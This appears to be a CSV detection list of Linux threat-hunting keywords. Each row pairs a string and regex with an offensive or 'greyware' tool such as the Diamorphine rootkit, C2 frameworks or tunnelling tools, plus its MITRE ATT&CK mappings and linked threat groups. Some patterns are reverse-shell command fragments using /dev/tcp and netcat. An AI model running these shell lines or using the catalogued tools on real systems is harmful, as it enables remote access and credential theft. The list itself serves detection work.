"*hacked_getdents64(*",".{0,1000}hacked_getdents64\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*hacked_kill(*",".{0,1000}hacked_kill\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*LKM_HACKING.html*",".{0,1000}LKM_HACKING\.html.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*/bash_completion.d/exegol*",".{0,1000}\/bash_completion\.d\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"*/bash_executor/*.go",".{0,1000}\/bash_executor\/.{0,1000}\.go","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","#linux","N/A","10","10","49","10","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z"
"*/bashexplode/boko*",".{0,1000}\/bashexplode\/boko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","#linux","N/A","N/A","1","67","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z"
"*/Bashfuscator*",".{0,1000}\/Bashfuscator.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1670","183","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z"
"*m0nad/Diamorphine*",".{0,1000}m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*MAGIC_PREFIX ""diamorphine_secret*",".{0,1000}MAGIC_PREFIX\s\""diamorphine_secret.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*MODULE_AUTHOR(""m0nad"")*",".{0,1000}MODULE_AUTHOR\(\""m0nad\""\).{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*MODULE_DESCRIPTION(""LKM rootkit""*",".{0,1000}MODULE_DESCRIPTION\(\""LKM\srootkit\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*/bin/0d1n*",".{0,1000}\/bin\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","#linux","N/A","7","","N/A","N/A","N/A","N/A"
"*/bin/AceLdr*",".{0,1000}\/bin\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","#linux","N/A","10","10","883","159","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z"
"*/bin/bash -c ""php -q -S 0.0.0.0:80 &"" > /dev/null 2>&1*",".{0,1000}\/bin\/bash\s\-c\s\""php\s\-q\s\-S\s0\.0\.0\.0\:80\s\&\""\s\>\s\/dev\/null\s2\>\&1.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","9","879","155","2024-07-23T13:19:03Z","2022-09-04T10:48:49Z"
"*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*",".{0,1000}\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","733","60","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z"
"*/bin/bash -c 'wg addconf *",".{0,1000}\/bin\/bash\s\-c\s\'wg\saddconf\s.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/bin/boringproxy*",".{0,1000}\/bin\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#linux","N/A","10","10","1233","117","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/bin/dataplicity*",".{0,1000}\/bin\/dataplicity.{0,1000}","greyware_tool_keyword","Dataplicity","enables connecting local systems to dataplicity cloud for remotely accessing them over the internet.","T1090 - T1102 - T1043 - T1071","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/wildfoundry/dataplicity-agent","1","0","#linux","N/A","9","2","166","32","2024-06-10T20:17:43Z","2016-07-27T14:23:01Z"
"*/bin/dropbear*",".{0,1000}\/bin\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1754","403","2024-12-04T16:13:34Z","2013-03-19T11:15:36Z"
"*/bin/fake-sms*",".{0,1000}\/bin\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","#linux","N/A","8","10","2726","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z"
"*/bin/gorsair *",".{0,1000}\/bin\/gorsair\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","0","#linux","N/A","N/A","9","852","71","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z"
"*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/bin/hakrawler*",".{0,1000}\/bin\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4523","499","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z"
"*/bin/htran*",".{0,1000}\/bin\/htran.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#linux","N/A","9","10","249","89","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z"
"*/bin/kidlogger*",".{0,1000}\/bin\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/bin/meshagent*",".{0,1000}\/bin\/meshagent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#linux","N/A","10","10","4349","581","2024-12-07T14:41:24Z","2017-08-28T16:21:11Z"
"*/bin/MeshCommander*",".{0,1000}\/bin\/MeshCommander.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#linux","N/A","10","10","4349","581","2024-12-07T14:41:24Z","2017-08-28T16:21:11Z"
"*/bin/nxcdb*",".{0,1000}\/bin\/nxcdb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","3336","377","2024-12-05T12:05:49Z","2023-09-08T15:36:00Z"
"*/bin/portr*",".{0,1000}\/bin\/portr.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#linux","N/A","10","10","2328","66","2024-11-30T12:13:04Z","2023-11-21T11:14:01Z"
"*/bin/posh*",".{0,1000}\/bin\/posh.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","#linux","N/A","10","10","1836","326","2024-12-02T07:38:00Z","2018-07-23T08:53:32Z"
"*/bin/processhider*",".{0,1000}\/bin\/processhider.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*/bin/proxy_cli.py*",".{0,1000}\/bin\/proxy_cli\.py.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","#linux","N/A","10","10","240","27","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z"
"*/bin/pspsy*",".{0,1000}\/bin\/pspsy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/bin/pupysh*",".{0,1000}\/bin\/pupysh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","#linux","N/A","10","10","8480","1820","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z"
"*/bin/rotateproxy*",".{0,1000}\/bin\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#linux","N/A","10","8","779","132","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z"
"*/bin/rsocks*",".{0,1000}\/bin\/rsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","#linux","N/A","10","10","130","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*/bin/sh | nc*",".{0,1000}\/bin\/sh\s\|\snc.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","#linux","greyware tool - risks of False positive !","N/A","10","8447","2214","2024-12-07T14:47:48Z","2016-12-24T09:48:49Z"
"*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","#linux","greyware tool - risks of False positive !","N/A","10","8447","2214","2024-12-07T14:47:48Z","2016-12-24T09:48:49Z"
"*/bin/Sleeper.o*",".{0,1000}\/bin\/Sleeper\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","#linux","N/A","10","10","170","26","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
"*/bin/staqlab-tunnel*",".{0,1000}\/bin\/staqlab\-tunnel.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#linux","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*/bin/syncthing*",".{0,1000}\/bin\/syncthing.{0,1000}","greyware_tool_keyword","syncthing","Open Source Continuous File Synchronization - abused by attackers for data exfiltration","T1046 - T1041 - T1020 - T1567","TA0043 - TA0007  - TA0010 ","N/A","Dispossessor - UAC-0020","Data Exfiltration","https://github.com/syncthing/syncthing","1","0","#linux","https://cert.gov.ua/article/6279600","9","10","66038","4332","2024-12-06T01:29:48Z","2013-11-26T09:48:21Z"
"*/bin/tor2web*",".{0,1000}\/bin\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","707","176","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z"
"*/bin/torify*",".{0,1000}\/bin\/torify.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A"
"*/bin/tshd*",".{0,1000}\/bin\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","543","128","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*/bin/tunnelmole.js*",".{0,1000}\/bin\/tunnelmole\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","#linux","N/A","10","10","1288","80","2024-11-26T09:03:11Z","2023-02-08T08:27:57Z"
"*/bin/tunwg*",".{0,1000}\/bin\/tunwg.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#linux","N/A","10","10","226","9","2024-09-18T15:03:45Z","2023-01-16T17:51:13Z"
"*/bin/unshackle*",".{0,1000}\/bin\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux","N/A","10","10","1817","121","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z"
"*/bin/wapiti*",".{0,1000}\/bin\/wapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","#linux","N/A","N/A","10","1238","187","2024-12-05T17:02:17Z","2020-06-06T20:17:55Z"
"*/bin/wireproxy*",".{0,1000}\/bin\/wireproxy.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#linux","N/A","10","10","4572","272","2024-09-03T20:21:40Z","2022-03-11T12:32:10Z"
"*/bin/x64/connectd.exe*",".{0,1000}\/bin\/x64\/connectd\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","#linux","N/A","10","10","42","11","2024-11-26T19:36:31Z","2019-01-12T00:59:20Z"
"*MODULE_NAME ""diamorphine""*",".{0,1000}MODULE_NAME\s\""diamorphine\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass|pass*",".{0,1000}pwd\|passwd\|password\|PASSWD\|PASSWORD\|dbuser\|dbpass\|pass.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*rmmod diamorphine*",".{0,1000}rmmod\sdiamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*writing-rootkit.txt*",".{0,1000}writing\-rootkit\.txt.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*/cliws -l *",".{0,1000}\/cliws\s\-l\s.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","157","27","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z"
"*/cliws -l 1000*",".{0,1000}\/cliws\s\-l\s1000.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","157","27","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z"
"*/cliws -p *",".{0,1000}\/cliws\s\-p\s.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","157","27","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z"
"*dirtycow*",".{0,1000}dirtycow.{0,1000}","offensive_tool_keyword","dirtycow","Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire","T1068 - T1055 - T1574.002","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","multiple pocs on github and others places ","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/credentials/SudoSnatch*",".{0,1000}\/credentials\/SudoSnatch.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","#linux","N/A","10","9","818","289","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z"
